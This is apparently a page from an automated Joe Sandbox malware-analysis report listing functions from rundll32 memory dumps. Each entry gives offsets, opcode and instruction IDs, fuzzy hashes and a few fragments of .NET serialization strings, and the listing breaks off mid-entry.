                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ystem.Collections.Generic.IEqualityComparer<System.Object>.Equals
                                                                                                                                                                                                                                          • API String ID: 0-3131439544
                                                                                                                                                                                                                                          • Opcode ID: d121ff63032582db48b39b84a28cad194976353ed518d586d66a13b7b88efa74
                                                                                                                                                                                                                                          • Instruction ID: 8ddb55392b92ca49f6742ce51d4691f423286b31ce0d3aefdfda873ed681dedf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d121ff63032582db48b39b84a28cad194976353ed518d586d66a13b7b88efa74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE0122072531917FB382A655D107A63ACE4B4575CF002CBADF418B641FBD6FC4513E2
                                                                                                                                                                                                                                          Function 04EF0C0C Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: rializingCallbacks
                                                                                                                                                                                                                                          • API String ID: 0-2731976878
                                                                                                                                                                                                                                          • Opcode ID: 5c455f1240447798b98f423ddfd86532d371385d41253be4db6826c3a0645a6b
                                                                                                                                                                                                                                          • Instruction ID: f652289dc2663e3c85426dd8c0759b6aab4db49741188aa724dc7fbe836066fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c455f1240447798b98f423ddfd86532d371385d41253be4db6826c3a0645a6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAD0A73231011CABA2046754DC9596A7BADE7852613904427FB0197310ED627C159396
                                                                                                                                                                                                                                          Function 04EF0E7C Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ter cannot read JSON with the specified existing value. {0} is required., xrefs: 04EF0E7C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ter cannot read JSON with the specified existing value. {0} is required.
                                                                                                                                                                                                                                          • API String ID: 0-2883852908
                                                                                                                                                                                                                                          • Opcode ID: fda660b4ad0b86d7d26fd9ce2c87cda48ee575919c367db22e1db6721abcaaf3
                                                                                                                                                                                                                                          • Instruction ID: 37d46666dd2b83749e27f3690a8eafb14da0c8476b38d9b8494e877d5b59ffc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fda660b4ad0b86d7d26fd9ce2c87cda48ee575919c367db22e1db6721abcaaf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B01246A14205D3B104A7314CE46A6449257C0204BC4EC412501680059D14F4051015
                                                                                                                                                                                                                                          Function 04EF2764 Relevance: .4, Instructions: 397COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 88bf42765b121c7927de0d28aca0b5032a751d4f3f9cbaad49eb8f7545de0084
                                                                                                                                                                                                                                          • Instruction ID: d0f437624fa64a90a2d6aecbd181ac310d12382e8dfd77cdbcf47c0146990737
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88bf42765b121c7927de0d28aca0b5032a751d4f3f9cbaad49eb8f7545de0084
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0E5B1C182058FDB84EB6994401D57FB1AA1524479452AEC409C7205EA379547CB40
                                                                                                                                                                                                                                          Function 04EF2268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e8166353fd3a0e19a979309fce38ddfe8619391cfdc718d1490728d4844db7e9
                                                                                                                                                                                                                                          • Instruction ID: 695a67408036b3cea8486968dfc2d86fcbc3403af0501803921f43a7a7fdc5d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8166353fd3a0e19a979309fce38ddfe8619391cfdc718d1490728d4844db7e9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41F975B112189FDB54DF68D88099EBBB2FF88314B148169EA05EB364DB32ED41CB90
                                                                                                                                                                                                                                          Function 04EF2258 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f24402f092c9c5d354f956fcdb24a7c369362c58d614bd8ffa75602ab8ccd00
                                                                                                                                                                                                                                          • Instruction ID: b8c6fe2fb36a28f7b0d621a414f754547cd5f3c1785e00a0c93c40dbaa1958ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f24402f092c9c5d354f956fcdb24a7c369362c58d614bd8ffa75602ab8ccd00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D213D75E102189FDB44DF68D8809DDBBF2FF4C310B14816AE915EB364DB31A942CB90
                                                                                                                                                                                                                                          Function 04EF1378 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4e180fdb761184c110c5bde052379d640f7968d845da9d419a9d07cd27ec6de9
                                                                                                                                                                                                                                          • Instruction ID: d14e888511b2331940d348d10799a02a13fe87a33a04d5d5c0e62062e2bc6db7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e180fdb761184c110c5bde052379d640f7968d845da9d419a9d07cd27ec6de9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C211571D002098FDB24DFAAC881BEEFBF0FB48320F508129D92967640C7756906CFA5
                                                                                                                                                                                                                                          Function 04EF1380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 034d094e3e7756e2a85ee0344f491422d189c3cf5107cf0d18f624f33e13d035
                                                                                                                                                                                                                                          • Instruction ID: 174fa5a0dc041b4c712507782496893b3ddeb5248b6774aa1d87b5e837273762
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 034d094e3e7756e2a85ee0344f491422d189c3cf5107cf0d18f624f33e13d035
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1124B0C002098FDB20DFAAC881BAEFBF4FF48310F508029D91967240CB756905CFA5
                                                                                                                                                                                                                                          Function 04B6D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1311915560.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_4b6d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 36b4f40014c6eca37451da60e295b92c2218aa0235af3edf8fdc79d78df084c7
                                                                                                                                                                                                                                          • Instruction ID: 404ee5cd79fcc581774ae403d996e2a2facf09650bd7f04cd08cf032ab9b6e2c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36b4f40014c6eca37451da60e295b92c2218aa0235af3edf8fdc79d78df084c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D015E7150D3C09FE7124B259C94752BFA8DF43224F1981DBE9898F1A3D26DAC49CB72
                                                                                                                                                                                                                                          Function 04B6D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1311915560.0000000004B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B6D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_4b6d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae87e57afa24edf6aeb65efa56ec82ff4322c3e0fd1a1a6d0cbbfeb645370c4c
                                                                                                                                                                                                                                          • Instruction ID: 293ce1b91d8edb41abf467d1caf17a94177acd865992f778c5330bb743c2c483
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae87e57afa24edf6aeb65efa56ec82ff4322c3e0fd1a1a6d0cbbfeb645370c4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D01F7717083409EE7204E35EC84B67BF8CDF41325F18C1AADC4A0F182D27CA845CAB5
                                                                                                                                                                                                                                          Function 04EF2A98 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d5318ae974d347806596da8efd5f7cb88286bc42d75b934af1bc6e2ba8d475e4
                                                                                                                                                                                                                                          • Instruction ID: ed18fd17eebb55c019aad7169ec070ae476a57ef264589118b78a242cc6fa8dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5318ae974d347806596da8efd5f7cb88286bc42d75b934af1bc6e2ba8d475e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF059367097014BE7395E26BCC02BD775BEFD439874890AADB48C7296DF299C069290
                                                                                                                                                                                                                                          Function 04EF25D1 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3ed2d5d4aa6e01323e634dd48732b3ca48fb98126b82f496778af6e86468ca07
                                                                                                                                                                                                                                          • Instruction ID: d0f5077846c37b5c76f4afb222b3d13a75a5ec0e1cce3a7aa514a91b42c3041a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed2d5d4aa6e01323e634dd48732b3ca48fb98126b82f496778af6e86468ca07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0E932F241048BEB4C9569E0541ED7777DBC9351B69912AD903A7384DF256D1EC740
                                                                                                                                                                                                                                          Function 04EF1BB0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a36e548be2a0835a629bb62ea4069bd8980337b491b213352c084f788ccbfa9
                                                                                                                                                                                                                                          • Instruction ID: f5edde491ba15565916c326e3e427896b20cdaca4040f5ee661c06c7210d9318
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a36e548be2a0835a629bb62ea4069bd8980337b491b213352c084f788ccbfa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19F09E3AB043448BD7281A169890319AB0A6BD42B8F0950BDCF04CB302EE249C018290
                                                                                                                                                                                                                                          Function 04EF25E0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f56819e7f785908e536c428b12f9514c0ab01a0ac40d63c9adfcc4f9e59cca09
                                                                                                                                                                                                                                          • Instruction ID: 036391a9cedc4e3ca7e6f332ea9ef1f6093cd060f474dc23d2ee5244c3aebfbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f56819e7f785908e536c428b12f9514c0ab01a0ac40d63c9adfcc4f9e59cca09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E0E536F101589BCB089668E4645EDBBBAEBC8211B118136D912A7340EF756D1DC790
                                                                                                                                                                                                                                          Function 04EF0F50 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 77c826302b7d72fc5d2a8c096bf4791f08e00a63debd42f2da8b0a6ee3536d36
                                                                                                                                                                                                                                          • Instruction ID: dc3109d21500fd3e748c37c6dc24944c8e5ca20280e97cf402b26910d1ff44a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c826302b7d72fc5d2a8c096bf4791f08e00a63debd42f2da8b0a6ee3536d36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E02B35648349CFD7159F25D875329BB68BF01208B259CCAD649CB203E925EC95C741
                                                                                                                                                                                                                                          Function 04EF2590 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 578e57e5fb07b48338cd62144e6026e9feeaa63d7bb57f5da23971ad647563d9
                                                                                                                                                                                                                                          • Instruction ID: 3d9fab2d59ba097723b784ffd28b59c4c18d5014d432e5366468122e16406e69
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 578e57e5fb07b48338cd62144e6026e9feeaa63d7bb57f5da23971ad647563d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2E086759093404FF726A774A4511D83B62EE81214386459AC1418B327DE286D4F87C3
                                                                                                                                                                                                                                          Function 04EF17F0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1dd0651add0a8fea0b6e43c59c4c14b1fa407910072f7a4815d6ec0a9d02d08a
                                                                                                                                                                                                                                          • Instruction ID: c4ab1d0a28fcf3715fabe2e6427c8b183a214a7d3158f544ee36c2ffb7b5d5e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd0651add0a8fea0b6e43c59c4c14b1fa407910072f7a4815d6ec0a9d02d08a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95D02E3A3182888FE30AFB51B4450993F3BAB56260348805BE901861ABDE2A0891C740
                                                                                                                                                                                                                                          Function 04EF1D10 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ec7c674e1542ca07ab744e4f93a8c707211f096a06a823ed3a72eedebd01bf63
                                                                                                                                                                                                                                          • Instruction ID: 323928ef66ea6430e51003bda31f72e6d5413c3887dd1eff19da59a32f8bb9c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec7c674e1542ca07ab744e4f93a8c707211f096a06a823ed3a72eedebd01bf63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD023306C030CDAF7003350BC2533776E8974070DF501014EF0C455C0CDD97C908151
                                                                                                                                                                                                                                          Function 04EF2A58 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3a199216916522a26258a142f668e57f601d7a584f2350bb6f51fa7ba7b5ef5c
                                                                                                                                                                                                                                          • Instruction ID: 094c3fdaf461bdec6312d7b1bbdb8825d57e0a65676f74695f53fbf4ca40dd8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a199216916522a26258a142f668e57f601d7a584f2350bb6f51fa7ba7b5ef5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E01270D0020DDF8740EFB9894155ABBF4BB48204B1085EDC54CD7204F7339502CB91
                                                                                                                                                                                                                                          Function 04EF1C29 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2703802a0d62dd775fb3fee9026a58c8ff5ddb303302bdb0a08ac4923fbfb8fb
                                                                                                                                                                                                                                          • Instruction ID: 64431ca87e445249489459e776c7bcd11d230b5af79b03e51f9d98facf4e9ef7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2703802a0d62dd775fb3fee9026a58c8ff5ddb303302bdb0a08ac4923fbfb8fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4C0809F607A584BEB191364AD0105ED7129BD2F14B015CD2C35DC5051E8085D4593A5
                                                                                                                                                                                                                                          Function 04EF0440 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 202c2f0663102339f9ab6cc22ccfdabd33377b5d8351669b95d10e4db0c2edd0
                                                                                                                                                                                                                                          • Instruction ID: b4441b4a2f66c7a7b417cbc0a3225e28593f4227104ffecce75369a158b4a77e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 202c2f0663102339f9ab6cc22ccfdabd33377b5d8351669b95d10e4db0c2edd0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C080F7D359546FE36105440C455F13730FB7120C3CDC25DCC4065403511779175179
                                                                                                                                                                                                                                          Function 04EF2C37 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 58a2f34b7d8d7389cc276a5c41ea204de40dea38c89774065321f84b86dbdcc8
                                                                                                                                                                                                                                          • Instruction ID: 917ddb904435f95e2ee230fa998ffe580c72cf0f66880657a00c2c22fa08c1fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58a2f34b7d8d7389cc276a5c41ea204de40dea38c89774065321f84b86dbdcc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC08C1214C3D8DDD323A2B12C207E5BF880B1202AF0E00EB96888B0E3C409849893B2
                                                                                                                                                                                                                                          Function 04EF1D28 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 48bd105365de8c534ac4d27a1e28a8e52fbe6a1b155b690c91bd7a49fe4acf44
                                                                                                                                                                                                                                          • Instruction ID: b6b350e80d6fd7a7f6491ebaaa90f1b6a6c343fe1103275a88ef07fe7d78c842
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48bd105365de8c534ac4d27a1e28a8e52fbe6a1b155b690c91bd7a49fe4acf44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BC09230B8030CBBFB1427A0FC35B6D7625EBD0B09F544021F60DBA6C4CDA59C508290

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 04EF0E8C Relevance: 6.4, Strings: 5, Instructions: 150COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$aScriptUtils$lowAdditionalItems$ructor$zingCallbacks
                                                                                                                                                                                                                                          • API String ID: 0-1867949473
                                                                                                                                                                                                                                          • Opcode ID: 2ab9c47323cb038431254cfcfede8c87b8902d9874b61e33b57791f17de10fd8
                                                                                                                                                                                                                                          • Instruction ID: 8091fc8497ee2ac4619b8b7304c47fce1a812dc1b393902b38f6d223516f618e
